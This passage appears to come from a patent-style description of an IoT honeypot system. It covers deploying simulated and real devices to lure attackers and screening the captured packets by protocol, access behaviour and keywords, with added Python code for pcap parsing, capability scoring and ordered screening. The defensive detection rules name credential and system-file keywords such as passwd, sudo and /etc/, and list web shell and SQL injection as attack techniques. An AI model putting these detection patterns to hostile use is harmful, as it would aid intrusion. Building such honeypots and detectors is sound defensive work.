For example, one of the associated attack-inducing subsystems may be a low-interaction honeypot and the other may be a real-device honeypot (i.e., a honeypot whose inducing device is implemented on an entity device) that multiplexes the induction server (or server-side inducing device) of the low-interaction honeypot.
Optionally, in one example, the association attack induction subsystem includes a first attack induction subsystem, and the step of deploying induction client devices of each association attack induction subsystem in a corresponding client end network according to a deployment manner of each association attack induction subsystem and a system deployment file may include:
simulating induction client equipment to be set in the first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and the system deployment file;
and simulating a first target protocol required to induce services provided by the client device in the public network.
In this example, the induction server and the induction client device are both in the public network, so that a user in the public network can access the induction client device through the induction server, and the induction server can acquire and store an access data packet of the user.
Wherein the first target protocol includes, but is not limited to: http (Hyper Text Transfer Protocol), ssh (Secure Shell Protocol), the telnet protocol, sip (Session Initiation Protocol), ftp (File Transfer Protocol), and the like.
Wherein different protocols may be used to simulate different services provided by the client device, e.g., simulate user web login services using simulated http, simulate user command line login services using simulated ssh, simulate user command line login services using simulated telnet, etc.
It will be appreciated that the protocols required to simulate different client devices may be different, for example, referring to fig. 2b, the external network server 1 is an induction server of this embodiment, corresponding to the external network server 1, on the same public network, there are deployed client devices such as a camera, an internet phone and a router, where the first target protocols corresponding to the camera include http and telnet protocols, and the first target protocols corresponding to the internet phone include http and voip (Voice over Internet Protocol, voice communication over IP network) protocols.
In one example, the step of deploying the client device for each associated attack-inducing subsystem in the corresponding client deployment network according to the deployment manner of each associated attack-inducing subsystem and the system deployment file may further include:
Simulating induction client equipment to be set in the first attack induction subsystem in a target intranet according to a deployment mode and a system deployment file of the first attack induction subsystem; and simulating a first target protocol required to induce services provided by the client device in the target intranet;
And exposing intranet access information of the induction client device in the target intranet in the public network, so that a public network user can access the induction client device through the first attack server.
In one example, the induction client device includes a router having a public network IP address on a public network.
Among these, the above-described modes of exposure include, but are not limited to, intranet penetration.
Optionally, the step of exposing intranet access information of the client device in the target intranet to the public network may include: determining the entity client device as the induction client device of the second attack induction subsystem, acquiring the public network access information obtained after the intranet access information of the entity client device is mapped to the public network, and storing the public network access information in the first induction server.
For example, a first access information mapping table (such as a NAT mapping table) may be set for the client device and stored in the network device, such as a router, to which the client device is connected. The mapping table contains the intranet access information (such as the intranet IP address and port information) of the client device in the target intranet of the first attack-inducing subsystem, and the public network access information obtained after mapping the intranet access information to the public network, where the public network access information includes a public network IP address (typically the router's public network IP address) and a port number; the public network access information of the client device is sent to the first induction server for storage. An attacking user in the public network can obtain the public network access information of the induction client device through the first induction server and send an access data packet to it. After the first induction server receives the access data packet, it forwards the packet to the router of the induction client device based on the public network access information, and the router forwards the access data packet to the induction client device in the target intranet based on the first access information mapping table. This improves the authenticity of the first attack induction subsystem and reduces the likelihood that the attacking user discovers the honeypot.
Alternatively, in this embodiment, the client device may be configured by an entity device. The association attack induction subsystem includes a second attack induction subsystem, and the step of deploying induction client devices of each association attack induction subsystem in a corresponding client end network according to a deployment mode and a system deployment file of each association attack induction subsystem may include:
Acquiring intranet access information of entity client equipment connected in a target intranet according to a deployment mode and a system deployment file of the second attack induction subsystem;
the entity client device is determined to be an induction client device of the second attack induction subsystem, and intranet access information of the entity client device is exposed in the public network.
Wherein the second attack-inducing subsystem is a real-device honeypot; in one example the induction server of the second attack-inducing subsystem may be a different server from the first induction server.
Of course, multiplexing the first induction server can improve the resource utilization rate and the system deployment efficiency. Optionally, in this embodiment, intranet access information of the entity client device in the target intranet may be read from the system deployment file, where the intranet access information includes, but is not limited to, information such as an IP address of the entity client device in the target intranet.
The manner of exposing the intranet access information of the entity client device in the public network includes, but is not limited to, intranet penetration.
For example, the entity client device includes a terminal device and a network device used by a user, such as a gateway device, etc., a second access information mapping table (such as a NAT mapping table) may be set for the client device induced in the second attack induction subsystem, where the mapping table includes intranet access information (such as an intranet IP address and port information) of the client device induced in a target intranet, and the intranet access information maps to a public network IP address (typically a public network IP address of a router) and a port number obtained in a public network, and the second access information mapping table may be stored in the gateway device, and the public network IP address and the port number obtained by mapping of the client device induced are sent to the first induction server so as to be stored, so that intranet penetration is achieved.
In one example, a high interaction honeypot may also be built to enhance the trapping ability of the attack-inducing system to hackers.
Optionally, the attack-inducing subsystem includes a third attack-inducing subsystem, and the step of deploying, based on the deployment mode and the system deployment file corresponding to the attack-inducing subsystem, a server-side inducing device of the attack-inducing subsystem in the public network and an inducing client-side device of the attack-inducing subsystem in the corresponding client-side deploying network includes:
Deploying a service end induction device based on a target Internet of things protocol in a public network based on a deployment mode and a system deployment file of a third attack induction subsystem, wherein the service end induction device comprises a second induction server;
simulating an Internet of things protocol client device based on the target Internet of things protocol in the target intranet to obtain an induction client device of the third attack induction subsystem;
And simulating an application program of the Internet of things protocol client device to operate in the target intranet so as to simulate the operation of the Internet of things protocol client device.
In one example, the second inducement server is different from the first inducement server.
The target internet of things protocol can be any protocol used in the field of the internet of things, including but not limited to the MQTT (Message Queuing Telemetry Transport) protocol.
The server-side induction device of the third attack induction subsystem can be a server side deployed on the MQTT protocol, and the induction server is an MQTT server (see the MQTT server in the high-interaction honeypot in fig. 2c).
The target intranet in this embodiment is not limited, and may be a laboratory intranet, and the client device of the third attack-inducing subsystem in this embodiment may include a plurality of MQTT clients.
In this embodiment, the application program of the internet of things protocol client device (such as its device firmware) may be run directly in an emulator, such as the QEMU emulator, to simulate the device running and thus the device itself.
202. According to the attack induction capability of the attack induction subsystem, determining the screening sequence and screening rule of attack data of each attack induction subsystem;
In this embodiment, before step 201, the data on the induction server may be monitored continuously. The monitoring manner includes, but is not limited to, running a monitoring command such as tcpdump on the induction server to monitor the data on a monitored port of the induction server and storing the monitored access data packets in a pcap file on the induction server. The storage frequency is not limited; for example, the access data packets may be written to the pcap file once per hour, that is, acquired once per hour. The pcap file may be stored in the cloud database corresponding to the induction server.
In step 201, a pcap file may be obtained from a cloud database to extract access data packets in the pcap file.
In this embodiment, the attack-inducing capability of the different attack-inducing subsystem is affected by the honeypot type of the attack-inducing subsystem, including the data of the inducing client device, and the like.
In one example, the attack inducement capability may be considered to be equivalent for all the attack inducement subsystems, and the screening order and the screening rule may be the same, i.e. the same screening rule may be used to screen the access data packets of all the inducement subsystems for attack data packets simultaneously. In this example, access packets from multiple induction servers may be stored together in a pcap file.
In one example, for different attack induction subsystems, the actual attack induction capability can be determined in a certain manner, and then different screening sequences can be adopted to screen the attack data packets. In this example, the pcap file may include a plurality of subfiles, each of which may store an access data package of the induction server.
In one example, after the server of the system hosting the security management device for access data obtains the access data packet from the pcap file, the access data packet may be parsed to obtain a parsed data packet, and the parsed data packet is stored in the database for use in the subsequent screening of attack data packets.
When the access data packet is analyzed, the access data packet can be split according to the data type, so that the analysis data packet is obtained.
The access data packet may be split according to ip address, port, access time, payload (payload), etc., and then stored in a database, for use in malicious traffic analysis (i.e., attack data packet analysis).
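The parsing and splitting step described above, as an added example that is not the patent's own code: a standard-library Python parser for the classic pcap format that tcpdump writes, which splits every captured IPv4 TCP or UDP access packet into the fields named above (IP addresses, ports, access time, payload). The capture is constructed inline, so the MAC addresses, IP addresses, ports and payloads are assumed sample values.

```python
import socket
import struct
from datetime import datetime, timezone

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
IPPROTO_UDP = 17


def _ipv4_packet(src_ip, dst_ip, proto, l4_bytes):
    """Minimal IPv4 header (no options, checksum left 0) around a transport segment."""
    total_len = 20 + len(l4_bytes)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, proto, 0,
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return header + l4_bytes


def _tcp_segment(src_port, dst_port, payload):
    # 20-byte header: data offset 5, flags PSH|ACK, checksum left 0 for the sample
    header = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return header + payload


def _udp_datagram(src_port, dst_port, payload):
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload


def _pcap_record(ts_sec, frame):
    # record header: ts_sec, ts_usec, captured length, original length
    return struct.pack("<IIII", ts_sec, 0, len(frame), len(frame)) + frame


def build_sample_pcap():
    """Constructed capture (not real data): two frames as tcpdump would write them."""
    eth = bytes.fromhex("020000000001") + bytes.fromhex("020000000002") + struct.pack("!H", ETHERTYPE_IPV4)
    global_header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    frames = [
        (1609459200, eth + _ipv4_packet("203.0.113.5", "198.51.100.10", IPPROTO_TCP,
                                        _tcp_segment(40000, 23, b"root\r\n"))),
        (1609459260, eth + _ipv4_packet("203.0.113.5", "198.51.100.10", IPPROTO_UDP,
                                        _udp_datagram(5060, 5060, b"INVITE sip:100@198.51.100.10 SIP/2.0\r\n"))),
    ]
    return global_header + b"".join(_pcap_record(ts, frame) for ts, frame in frames)


def _parse_frame(frame):
    """Split one Ethernet frame into transport protocol, addresses, ports and payload."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    proto = ip[9]
    l4 = ip[ihl:total_len]
    if proto == IPPROTO_TCP:
        src_port, dst_port = struct.unpack_from("!HH", l4, 0)
        payload = l4[(l4[12] >> 4) * 4:]
        name = "tcp"
    elif proto == IPPROTO_UDP:
        src_port, dst_port = struct.unpack_from("!HH", l4, 0)
        payload = l4[8:]
        name = "udp"
    else:
        return None  # other transport protocols are outside this example
    return {"protocol": name, "src_ip": socket.inet_ntoa(ip[12:16]), "dst_ip": socket.inet_ntoa(ip[16:20]),
            "src_port": src_port, "dst_port": dst_port, "payload": payload}


def split_access_packets(pcap_bytes):
    """Walk a classic pcap file and return one parsed record per IPv4 TCP/UDP packet."""
    magic = struct.unpack_from("<I", pcap_bytes, 0)[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack_from(endian + "I", pcap_bytes, 20)[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    records, offset = [], 24
    while offset + 16 <= len(pcap_bytes):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap_bytes, offset)
        offset += 16
        parsed = _parse_frame(pcap_bytes[offset:offset + incl_len])
        offset += incl_len
        if parsed is not None:
            parsed["access_time"] = datetime.fromtimestamp(ts_sec + ts_usec / 1e6, tz=timezone.utc).isoformat()
            records.append(parsed)
    return records


if __name__ == "__main__":
    for record in split_access_packets(build_sample_pcap()):
        print(record)
```

Each returned record has exactly the columns the text stores in the database, so it can be inserted as-is for the later attack data packet screening.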
Alternatively, the number and content of screening rules for different attack-induction subsystems may be different. Screening rules refer to rules for determining attack data packets, the screening dimension of the screening rules is not limited, and the number of the screening rules is not limited.
203. Determining a currently screened attack induction subsystem based on the screening sequence of each attack induction subsystem;
The currently screened attack induction subsystem is the one that comes earliest in the screening order among the attack induction subsystems that have not yet been screened.
It will be appreciated that the number of attack-inducing subsystems currently screened may be at least one.
204. If the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence, determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packet received by the currently screened attack induction subsystem;
In the example where the attack-inducing capabilities of the attack-inducing subsystems are considered to be the same, the currently screened attack-inducing subsystem is all the attack-inducing subsystems, and the analysis of the attack data packet with reference to fig. 2d can be roughly divided into four major steps: data screening, logic detection, fuzzy matching and accurate matching.
Optionally, in one example, the step of determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem may include:
obtaining corresponding analysis data packets for all the access data packets received by the attack induction subsystem;
Acquiring access behavior characteristic information corresponding to the analysis data packet based on the data of the analysis data packet; determining suspicious analysis data packets in the analysis data packets based on the access behavior characteristic information and the screening rule of the access behavior dimension;
And carrying out attack characteristic matching on the suspicious analysis data packet based on attack characteristic information of the attack data packet preset in the screening rule, and determining the attack data packet in the access data packet based on a matching result.
The access behavior characteristic information may include, among other things, the type of protocol used and the access characteristics of the accessing party.
Alternatively, the parsed data packets may be obtained from a database. The filtering rules may include a protocol type preset for the suspicious parsed packet and access characteristics of the accessing party. One of the protocol types may be considered a screening rule, and one of the access features may be considered a screening rule.
The protocol type is used for carrying out a data screening step, and the access characteristic is used for carrying out a logic detection step.
Optionally, the step of acquiring access behavior feature information corresponding to the parsed data packet based on the parsed data packet; determining suspicious ones of the resolution packages based on the access behavior feature information and the screening rules for access behavior dimensions may include:
Acquiring a protocol used for analyzing the data packet based on the data of the analyzed data packet;
Based on the data of the analysis data packet, access characteristics of a sending user of the analysis data packet are obtained;
If the protocol of the analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining that the analysis data packet is the suspicious analysis data packet.
The preset protocol may be set according to needs, for example, the preset protocol includes, but is not limited to: tcp, ssh, sip, http, mqtt, soap, etc.
The access characteristics may include the geographical location and host address of the terminal (host) used by the accessing party, the access duration, the number of accesses, the port (of the induction server) to which a connection was attempted, and other characteristics of the accessing party's access to the induction server. For each access characteristic, a specific access characteristic corresponding to a suspicious user may be set; for example, a suspicious user is a user whose access count is not less than 100, and so on.
The order of the data screening and logic detection steps is not limited.
Alternatively, in this embodiment, the filtering rule may include a filtering rule set from a keyword dimension, where the keyword is understood as a keyword that may appear in the attack packet, and the keyword may be set manually. After determining the suspicious analytical data packet, more accurate matching can be performed based on the screening rule, and the step of performing attack feature matching on the suspicious analytical data packet based on attack feature information of the attack data packet preset in the screening rule and determining the attack data packet in the access data packet based on the matching result can include:
performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in the screening rules;
determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;
and determining an attack data packet in the access data packet based on the high-suspicious analysis data packet.
The keywords of the attack data packet may be keywords with a high occurrence frequency counted from historical attack data packets, or keywords related to sensitive operations such as user permissions or protocol modification; optionally, the keywords include but are not limited to: root, passwd, password, su, sudo, admin, /etc/, etc. When a keyword is detected in the payload of a parsed data packet, the packet is likely to be a highly suspicious parsed data packet.
Optionally, the screening rules can also include screening rules set from the dimension of network attacks, and such screening rules include attack characteristics of network attacks.
Optionally, the network attack includes, but is not limited to, a vulnerability attack, an attack against an internet of things protocol, and an attack performed by using some general network attack methods, and correspondingly, the screening rule may include a vulnerability feature of a preset vulnerability, an attack feature against an internet of things protocol, an attack feature of a preset attack network method, and so on.
Optionally, the step of determining an attack packet in the access packet based on the high suspicious resolution packet may include:
if the payload of the high-suspicious parsed data packet contains the vulnerability characteristics of a preset vulnerability in the screening rules; or the content associated with the internet of things protocol in the high-suspicious parsed data packet has the attack characteristics for the internet of things protocol set in the screening rules; or the data of the high-suspicious parsed data packet has the attack characteristics of a preset attack network method set in the screening rules;
and determining the access data packet corresponding to the high-suspicious analysis data packet as an attack data packet.
The preset vulnerabilities can be any existing vulnerabilities, and the internet of things protocol includes but is not limited to related protocols such as MQTT, SOAP and the like.
In this embodiment, for the attack induction subsystem with the real device (i.e., the entity client device), a filtering rule based on the detection dimension of the specific operation page of the real device may also be set, and in this type of filtering rule, specific operation page data of the real device included in the attack data packet may be set. The type and specific content of the specific operation page are not limited, and may be, for example, a management page of a real device, a user page, a data download page, and the like. The specific operation page is a user operation page that is not exposed when the entity client device in the embodiment is exposed in the public network. For example, when the entity client device is exposed in the public network, only the data of the login page is exposed, the user can only access the login page through the public network access attack induction subsystem, and can enter other operation pages such as a management page after logging in the entity client device through account information.
If an access data packet of a user includes data of any specific operation page, and the access data packet is sent without the user logging into the entity client device, the access data packet may be determined as an attack data packet.
Optionally, the present embodiment further includes: if the high-suspicious analysis data packet contains information of the entity client device which is not exposed to the public network, the access data packet corresponding to the high-suspicious analysis data packet can be considered as an attack data packet. Wherein the information not exposed to the public network may include a specific operation page of the physical client device.
In this embodiment, the preset network attack technique includes, but is not limited to, general attack techniques such as a web shell attack and an SQL (Structured Query Language) injection attack.
In another example, the attack induction capability of an attack induction subsystem is related to the honeypot technology used by the subsystem and to the type, number and disguised services of the induction client devices it contains. Generally, the more complex the honeypot technology, the larger the number and the richer the types of induction client devices, and the more disguised services there are, the stronger the attack induction capability. The stronger the attack induction capability, the earlier the subsystem is placed in the screening order.
In this example, the screening orders of the attack induction subsystems are not identical and may be determined according to the attack induction capability of each attack induction subsystem for attack data packets. In one example, the step of determining the screening order of each attack induction subsystem based on its attack induction capability may be performed when a subsystem of the attack induction system changes, for example when a subsystem's disguised services change or when its induction client devices change (including deletion, addition, etc.). When no attack induction subsystem has changed, the screening order need not be updated.
In this embodiment, different types of attack induction subsystems differ in the time required for deployment and in how they are expected to be deployed and updated. For example, an attack induction subsystem deployed based on low-interaction honeypot technology has a short deployment time, can start inducing attacks quickly, and reaches a relatively high attack induction capability soon after deployment.
In this embodiment, the deployment duration of an attack induction subsystem implemented with a high-interaction honeypot may be set longer: some basic server devices such as an induction server and a few induction client devices may be deployed first, and the structure of the attack induction subsystem is then expanded gradually, adding induction client devices over time, which reduces the high short-term deployment cost that a complex attack induction subsystem would otherwise require. As the attack induction subsystem is completed, its attack induction capability gradually increases.
Therefore, in this embodiment, the relative strength of the attack induction capability of different attack induction subsystems may change over time. A strong attack induction capability tends to increase the number of attack data packets an attack induction subsystem receives, and one attacking user may attack several attack induction subsystems at the same time. The embodiment therefore screens the attack data packets of the attack induction subsystem with the strongest attack induction capability first, and uses that screening result when screening the attack data packets of the subsystems screened later, so that the access data packets of every attack induction subsystem do not all have to be matched against their screening rules, which reduces the resources required for screening.
The attack induction capability of an attack induction subsystem may be determined periodically at a fixed time interval, or when a change (such as a structural change or a change of disguised services) of an attack induction subsystem is detected.
After each determination, the determined attack induction capability may be converted into identification information, such as a numerical value reflecting the strength of the attack induction capability, and the old identification information of the attack induction subsystem is replaced by the newly determined identification information. In the step of determining the screening order, the identification information of each attack induction subsystem may be read and the screening order of the attack data packets of the attack induction subsystems determined from it. In one example, different attack induction subsystems may share one set of screening rules; alternatively, the screening rules of different attack induction subsystems may differ and be stored separately according to user settings. Optionally, a correspondence between the screening rules of an attack induction subsystem and its identification information may be established, so that the screening order and the screening rules are determined together from the identification information.
Optionally, the attack induction capability of an attack induction subsystem may be determined according to the honeypot technology used by the attack induction subsystem, the number of server-side induction devices and induction client devices it contains, its disguised services, and so on. Optionally, corresponding score values may be set for the different server-side induction devices and induction client devices, and the same kind of server-side induction device may be given different score values according to factors such as its size; for example, for an induction server, the larger the server (the more computing resources), the larger the score value. Corresponding score weighting values may be set for the different honeypot technologies; the score values are then summed, the sum is weighted with the score weighting value, and the resulting total score is the identification information of the attack induction capability of the attack induction subsystem.
Wherein, the more complex the honeypot technique, the higher the score weighting value.
It can be understood that, when the attack induction system has just been deployed, low-interaction honeypot technology is simple and fast to deploy, so the number of induction client devices and the like contained in the attack induction subsystem deployed based on that technology is far greater than in the other attack induction subsystems, and its attack induction capability is the highest. As the other attack induction subsystems (for example, those deployed based on high-interaction honeypot technology) are completed over time, their attack induction capability grows stronger and gradually exceeds that of the attack induction subsystem deployed based on low-interaction honeypot technology.
In an example, the screening rules may also be updated along with the updating of the attack induction subsystems. Optionally, the embodiment further includes receiving a screening rule update instruction sent by a target attack induction subsystem, where the screening rule update instruction includes a newly added screening rule; parsing the newly added screening rule from the screening rule update instruction; storing the newly added screening rule; and establishing a correspondence between the newly added screening rule and the identification information of the attack induction capability of the target attack induction subsystem.
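The weighted-sum scoring and the resulting screening order described above, as an added example that is not the patent's own code. Device score values, honeypot technology weights and the two subsystem inventories are assumptions chosen to reproduce the situation just described: the low-interaction subsystem is first right after deployment, and the high-interaction subsystem overtakes it once it has been expanded. The identification information is only recomputed when the subsystem's structure, services or technology change.

```python
"""Added example (not the patent's code): the weighted score the text describes for
attack induction capability, and the screening order derived from it. Device score
values, technology weights and the subsystem inventories are assumed."""
from dataclasses import dataclass

DEVICE_SCORES = {              # score value per induction device type (assumed)
    "server_small": 2, "server_large": 5,      # larger server, more resources, higher
    "client_camera": 1, "client_router": 1,
    "client_real_device": 3,                   # entity client device
}
TECH_WEIGHTS = {"low_interaction": 1.0, "medium_interaction": 1.5, "high_interaction": 2.0}

@dataclass
class Subsystem:
    name: str
    honeypot_tech: str
    devices: dict                 # device type -> count
    disguised_services: int = 0   # each disguised service assumed to add one point

def capability_score(sub):
    """Identification value = weight(honeypot tech) * (sum of device scores + disguised services)."""
    total = sum(DEVICE_SCORES[kind] * n for kind, n in sub.devices.items()) + sub.disguised_services
    return TECH_WEIGHTS[sub.honeypot_tech] * total

def fingerprint(sub):
    """What a 'change' of the subsystem means here: structure, services or technology."""
    return (sub.honeypot_tech, tuple(sorted(sub.devices.items())), sub.disguised_services)

def update_identification(store, sub):
    """Recompute the identification information only when the subsystem changed;
    the old value is replaced by the new one. Returns True when it was replaced."""
    fp = fingerprint(sub)
    entry = store.get(sub.name)
    if entry is not None and entry[0] == fp:
        return False
    store[sub.name] = (fp, capability_score(sub))
    return True

def screening_order(store, two_positions=False):
    """Subsystem names ordered by descending capability. With two_positions the
    strongest subsystem is screened first and all others share the second position."""
    ranked = sorted(store, key=lambda name: store[name][1], reverse=True)
    if two_positions and len(ranked) > 1:
        return [[ranked[0]], ranked[1:]]
    return [[name] for name in ranked]

if __name__ == "__main__":
    store = {}
    low = Subsystem("B", "low_interaction", {"server_small": 1, "client_camera": 20, "client_router": 10})
    high = Subsystem("A", "high_interaction", {"server_large": 1, "client_camera": 2})
    update_identification(store, low); update_identification(store, high)
    print(screening_order(store))          # freshly deployed: low-interaction B first
    high.devices.update({"client_camera": 10, "client_real_device": 2}); high.disguised_services = 4
    update_identification(store, high)
    print(screening_order(store))          # after expansion: high-interaction A first
```

Keeping the fingerprint next to the score is what lets a periodic job skip subsystems that have not changed; a subsystem whose inventory is edited in place without going through `update_identification` would keep a stale score, so in practice the inventory source (deployment file or registry) should be the single place the fingerprint is read from.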
205. If the currently screened attack induction subsystem is not arranged in the first position of the screening order, acquiring the sending users of the attack data packets already screened out based on the screening results of the attack induction subsystems already screened; determining, among the access data packets received by the currently screened attack induction subsystem, the access data packets sent by those sending users as attack data packets; and determining the attack data packets in the remaining, not yet screened access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and those access data packets;
If the currently screened attack induction subsystem is not the first attack induction subsystem in the screening order, the sending users of the attack data packets in the screening results of the attack induction subsystems preceding it in the screening order are determined; the determined sending users may come from the attack data packets of all attack induction subsystems whose screening order precedes the currently screened one.
For example, if there are three attack induction subsystems, denoted A, B and C, and the screening order is A, C, B, then A is screened according to its corresponding screening rule, and after A has been screened the sending users of A's attack data packets (called first sending users for distinction) are determined from the screening result. When the access data packets of C are screened, the access data packets sent by the first sending users are screened out as attack data packets first, the remaining access data packets are screened according to C's corresponding screening rule, and the sending users of the attack data packets screened out of those remaining access data packets (called second sending users for distinction) are determined. When B is screened, the access data packets sent by the first sending users and the second sending users are screened out as attack data packets, and the remaining access data packets are then screened according to B's corresponding screening rule.
Alternatively, in the step of determining the sending users of the attack data packets from the screening results of the attack induction subsystems preceding the currently screened one, the determined sending users may include only the sending users of the attack data packets of the attack induction subsystem in the first position of the screening order.
When the number of attack induction subsystems is large and they are screened one after another in the screening order, the screening may take a long time. Considering that cloud servers and the like now have strong parallel processing capability and can process a large amount of data in a short time, this capability can be exploited to shorten the screening time so that attack data packets are handled as early as possible.
Optionally, in one example, when the currently screened attack induction subsystem is determined based on the screening order of the attack induction subsystems, the screening order has only two positions: the attack induction subsystem with the strongest attack induction capability occupies the first position, and all remaining attack induction subsystems share the second position.
In this example, after the attack data packet is screened out from the access data packets of the attack-inducing subsystem with the strongest attack-inducing capability, the access data packets of the remaining attack-inducing subsystem may be screened at the same time.
In this example, the order in which the access data packets of the different attack induction subsystems are parsed need not follow the screening order, i.e., the access data packets of the different attack induction subsystems may be parsed into the corresponding analysis data packets before any attack data packet is screened, and the screening then proceeds according to the screening order and the screening rules.
In another example, when attack data packets need to be screened, the corresponding data packets may be parsed again at that time.
Optionally, the step of determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem may include:
Obtaining a corresponding analysis data packet for the access data packet received by the currently screened attack induction subsystem;
acquiring access behavior characteristic information corresponding to the analysis data packet, and determining suspicious analysis data packets in the analysis data packet based on the access behavior characteristic information;
and carrying out feature matching on the suspicious analysis data packet based on attack characteristic information of the attack data packet preset in a screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on a matching result.
For the specific steps of parsing an access data packet, the concepts of access behavior feature information and attack feature information, and the process of determining the analysis data packet, reference may be made to the related description in the foregoing examples, which is not repeated here.
Optionally, the step of "obtaining access behavior feature information corresponding to the parsed data packet, and determining the suspicious parsed data packet in the parsed data packet based on the access behavior feature information" may include:
acquiring the protocol used by the analysis data packet based on the data of the analysis data packet;
acquiring, based on the data of the analysis data packet, the access characteristics of the sending user of the analysis data packet;
if the protocol used for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack-inducing subsystem, and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule corresponding to the currently screened attack-inducing subsystem, determining that the analyzed data packet is the suspicious analyzed data packet.
The relevant explanation of the preset protocol and the specific access feature refers to the relevant explanation in the foregoing examples, and is not repeated here.
In one example, feature matching is performed on suspicious analysis data packets based on attack feature information of attack data packets preset in a screening rule corresponding to a currently screened attack induction subsystem, and attack data packets in access data packets are determined based on a matching result, which specifically may include: performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in screening rules corresponding to the currently screened attack induction subsystem; determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet; and determining an attack data packet in the access data packet based on the high-suspicious analysis data packet.
For the explanation of the preset attack data packet keywords and the like, refer to the related description of the foregoing examples, which is not repeated here.
Optionally, the step of determining an attack data packet in the access data packet based on the high-suspicious analysis data packet may include:
if the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of a preset vulnerability set in the screening rule corresponding to the currently screened attack induction subsystem; and/or the content associated with the internet of things protocol in the high-suspicious analysis data packet has the attack characteristics for the internet of things protocol set in that screening rule; and/or the data of the high-suspicious analysis data packet has the attack characteristics of a preset network attack technique set in that screening rule;
determining the access data packet corresponding to the high-suspicious analysis data packet as an attack data packet.
For the vulnerability characteristics of the preset vulnerabilities, the attack characteristics for the internet of things protocol, the attack characteristics of the preset network attack techniques and the like, reference may be made to the related description of the foregoing examples, which is not repeated here.
If the currently screened attack induction subsystem is not the first in the screening order, the step of determining the attack data packets in its not yet screened access data packets, based on its corresponding screening rule and those access data packets, uses the same screening scheme as the first attack induction subsystem in the screening order: the input is the not yet screened access data packets of the currently screened attack induction subsystem instead of all of its access data packets, the screening rule is that of the currently screened attack induction subsystem, and the other screening steps are identical, so they are not repeated here.
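The screening pipeline of steps 204 and 205 end to end, as an added example that is not the patent's own code: it covers both the attack determination rules given above for a high-suspicious analysis data packet (vulnerability characteristics, internet of things protocol characteristics, generic attack technique, and the unexposed operation page rule for real devices) and the ordered screening in which sending users found at earlier positions are treated as attackers in later ones, including the two-position parallel variant. Packets are assumed to be already parsed; the packet fields, the rule contents and the sample traffic are constructed for illustration.

```python
"""Added example (not the patent's code): per-subsystem screening and ordered,
sender-propagating screening across subsystems. Packet fields, rule contents and
the sample traffic are assumed/constructed for illustration."""
import re
from collections import Counter
from dataclasses import dataclass, field

@dataclass
class Packet:                  # an already parsed (analysis) data packet
    subsystem: str             # attack induction subsystem that received it
    sender: str                # sending user, identified here by source IP
    protocol: str              # e.g. "http", "mqtt"
    path: str = ""             # requested operation page, HTTP only
    payload: str = ""
    logged_in: bool = False    # sender had logged in to the entity client device

@dataclass
class Rules:                   # one subsystem's screening rule, contents assumed
    preset_protocols: set      # using such a protocol makes the packet suspicious
    rate_threshold: int        # access feature: packets per sender in one batch
    keywords: list             # attack data packet keywords (high-suspicious stage)
    vuln_signatures: list      # vulnerability characteristics (regex)
    iot_signatures: dict       # protocol -> attack characteristics (regex)
    attack_signatures: list    # generic network attack techniques (regex)
    unexposed_pages: set = field(default_factory=set)  # real-device pages not public

def suspicious(pkt, rules, per_sender):
    return pkt.protocol in rules.preset_protocols or per_sender[pkt.sender] >= rules.rate_threshold

def high_suspicious(pkt, rules):
    text = (pkt.path + " " + pkt.payload).lower()
    return any(k in text for k in rules.keywords)

def attack_rule_hit(pkt, rules):
    """Name of the screening rule a high-suspicious packet hits, or None."""
    for sig in rules.vuln_signatures:
        if re.search(sig, pkt.payload, re.I):
            return "vuln:" + sig
    for sig in rules.iot_signatures.get(pkt.protocol, []):
        if re.search(sig, pkt.payload, re.I):
            return f"iot:{pkt.protocol}:{sig}"
    for sig in rules.attack_signatures:
        if re.search(sig, pkt.payload, re.I):
            return "attack:" + sig
    if pkt.path in rules.unexposed_pages and not pkt.logged_in:
        return "unexposed_page:" + pkt.path   # unexposed page reached without a login
    return None

def screen_subsystem(packets, rules, known_attackers):
    """Packets from senders found attacking an earlier subsystem are attack packets
    without matching; the rest pass suspicious -> high-suspicious -> rule matching."""
    per_sender = Counter(p.sender for p in packets)
    found = []
    for pkt in packets:
        if pkt.sender in known_attackers:
            found.append((pkt, "propagated"))
        elif suspicious(pkt, rules, per_sender) and high_suspicious(pkt, rules):
            rule = attack_rule_hit(pkt, rules)
            if rule:
                found.append((pkt, rule))
    return found

def screen_all(packets, order, rules_by_subsystem):
    """order: list of positions; subsystems sharing a position are screened in
    parallel and inherit attackers only from strictly earlier positions."""
    by_sub = {}
    for p in packets:
        by_sub.setdefault(p.subsystem, []).append(p)
    known, results = set(), {}
    for position in order:
        found_here = set()
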